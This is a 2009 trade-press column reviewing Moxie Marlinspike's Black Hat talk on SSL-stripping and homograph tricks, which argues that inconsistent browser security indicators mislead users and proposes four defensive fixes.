Moxie Marlinspike's presentation <a href="https://media.blackhat.com/bh-dc-09/video/Marlinspike/blackhat-dc-09-marlinspike-slide.mov" target="_blank"><em>New Tricks for Defeating SSL in Practice</em></a> should be an eye-opening presentation on the fragility of the trust we place secure Web sites. Marlinspike uses some fairly mundane technical tricks coupled with astute observations about human behavior to pull off a difficult task -- seamlessly subverting the indicators of HTTPS Web sites prese

Mike Fratto, Former Network Computing Editor

February 20, 2009

7 Min Read

Moxie Marlinspike's presentation New Tricks for Defeating SSL in Practice should be an eye-opening presentation on the fragility of the trust we place secure Web sites. Marlinspike uses some fairly mundane technical tricks coupled with astute observations about human behavior to pull off a difficult task -- seamlessly subverting the indicators of HTTPS Web sites presented to a user and fooling the victim into trusting when they shouldn't.First off, SSL isn't broken and Marlinspike doesn't say that, either. What is broken is how users perceive a secure Web session from an insecure one. Marlinspike pulls off this trickery pretty easily by proxying SSL connections, re-writing HTTPS URLs to HTTP URLs, capturing data in between, and presenting to the user a seamless and secure-looking Web session. SSLstrip will be available on Marlinspike's Web site thoughtcrime.com later this week. It's a technical implementation of social engineering, an observation Tom Claburn made in Black Hat: Security Pro Shows How To Bypass SSL.

I teach a graduate class on network security at Syracuse University. A few weeks ago we were talking secure e-mail and whether you should sign the plaintext first and then encrypt the message or encrypt the plaintext and then sign the encrypted message. I posed the question in terms of what it means to sign something. If you sign the plain text, you are asserting knowledge of the message. If you sign the encrypted message, you don't know what you are signing -- it's encrypted. Truth is, in either case, you don't really know what you are signing because the program does the work on your behalf and you don't see it. The program could insert anything into the message that you have just signed. I'm not going to get esoteric on you. My point is that we trust our programs are working properly based on visual cues from the programs. That's reasonable.

Go to your bank's Web site. Chances are that the url is of the form http://www.yourbank.com. If you try SSL, you can enter https://www.yourbank.com and you will have an SSL-enabled session. But look at the two different sites. Do you see any difference? If your bank isn't using an Extended Validation Certificate, chances are that the only indicators are a lock somewhere on your browser and the 's' in https. But the site looks the same. Marlinspike makes an amusing display during his presentation that there is little to indicate when you are using an HTTP versus HTTPS session. He even went to the trouble to create a favicon shaped like a lock -- a favicon is that little logo-looking thing you see next to the URL in the address bar. I think if I were to see a lock next to an http URL, I'd be confused and have to go figure out what was going on.

Then just to wrap everything into a neat little package, he then goes on to present a twist to that scenario where using a wild card SSL certificate and internationalized domain names (IDN), an attacker can seamlessly, with no visual clues, proxy SSL connections unbeknownst to the user. Web site certificates are usually tied to a specific host name like www.example.com. A wild card certificate can be used for any host in the example.com domain. Internationalized domain names allow countries whose alphabet isn't ASCII based to use their own letter or symbols in domain names. However, many IDN characters render as or similar to ASCII. These homograph attacks, combined with wild card certificates, can hide what is really happening form the casual user.

It's pretty clever and works because the application seems to behave normally. In an e-mail, Marlinspike elaborated:

The initial vector that I outline here -- attacking the bridge between HTTP and HTTPS -- is only the beginning for a new class of attacks. I disclosed one of those (the homograph stuff), but there's actually a whole world of places that you can go from there which I did not disclose. Those can tolerate a much less forgiving user.

Any individual browser or site operator isn't going to be able to do much to protect against this, short of trying to deploy Band-Aids that will only result in an arms race (at best).

Extended Validation To The Rescue

No, extended validation certificates are not the answer. Not really. EV certificates are supposed to engender more trust in a Web site because a bunch of certificate authorities agreed on a common set of steps to authenticate a domain owner prior to issuing a digital certificate. While I applaud the ability of the EV certificate authorities to agree to a common set of criteria to indentify an entity prior to issuing an EV certificate, and the visual cues like the green address bar in IE7 and Firefox 3 are much more pronounced than a little golden lock off in a corner, the fact is the user still has to differentiate between SSL sites and non-SSL sites. It's just adding one more confusing visual cue to a whole string of confusing visual cues.

The whole mess is exacerbated by too many formats, too many displays, too much reliance on users to interpret visual indicators. Today you can see a green address bar, a green indicator, a white address bar, a red address bar, a red indicator, a lock, or no lock. Unless you know what those things mean and where they show up in the browser during normal operations, it's all confusing. Marlinspike's demonstration using a image of a lock as a favicon (the common indicator for an SSL site) to fool the user into thinking they are at a SSL-enabled site. But the lock is in the wrong place -- on the left of the address bar. The SSL lock in Firefox is in the status bar and in IE it is on the right of the address bar. But you have to know that.

I don't know what the solution is. If I did, I'd be seeking venture capital and working on an elevator pitch. But I think there are four things that can help:

  1. There needs to be a consistent user interface that all browsers conform to that shows when SSL is enabled and when it isn't. Meaning all browsers put the SSL-enabled display in the same place and in the same fashion. The display should be beyond the control of the Web page or the media, like a favicon, sent from a Web server.

  2. Web site owners like financial institutions that today mix HTTP with HTTPS should stop using HTTP for their entire site and move to HTTPS. Even a redirect from HTTP to HTTPS is OK. PayPal does this. If you get to Paypal.com and it is not HTTPS, then you know you have a problem. But even PayPal isn't consistent. Many of its footer links are HTTP links and should be HTTPS. Correction: The links in the page are HTTP, but they redirect to HTTPS.

  3. In Web browsers, there should be a clear indicator of the top- and second-level domain of the site you are visiting. Marlinspike's homograph demonstration relied on the portion of the URL containing the domain name being moved off the end of the address bar.

  4. Finally, if these changes are instituted, there needs to be a concerted outreach effort by all parties explaining clearly what indicators look like and that abnormal indicators should not be trusted. Users are smart if you give them a chance. But don't expect them to be experts. You drive a car without knowing how to change the oil, right?

The sad truth is, none of these suggestions will be adopted. It's too disruptive and everyone from browser vendors to Web site owners are too afraid of rocking the boat. SSL failures should be treated as such, but instead users are allowed to by-pass them easily, which is reinforced by years of clicking through error dialogs. Many years ago I advocated that financial institutions shouldn't send e-mails with links in them because that reinforces insecure behavior -- if it looks like my bank e-mail, it must be -- which enables phishing. But I still get them in my in-box.

Users are smart. Users want to know when they are protected and when they aren't. But inconsistent UIs and Web applications aren't the answer.

About the Author(s)

Mike Fratto

Former Network Computing Editor

Mike Fratto is a principal analyst at Current Analysis, covering the Enterprise Networking and Data Center Technology markets. Prior to that, Mike was with UBM Tech for 15 years, and served as editor of Network Computing. He was also lead analyst for InformationWeek Analytics and executive editor for Secure Enterprise. He has spoken at several conferences including Interop, MISTI, the Internet Security Conference, as well as to local groups. He served as the chair for Interop's datacenter and storage tracks. He also teaches a network security graduate course at Syracuse University. Prior to Network Computing, Mike was an independent consultant.

Never Miss a Beat: Get a snapshot of the issues affecting the IT industry straight to your inbox.

You May Also Like


More Insights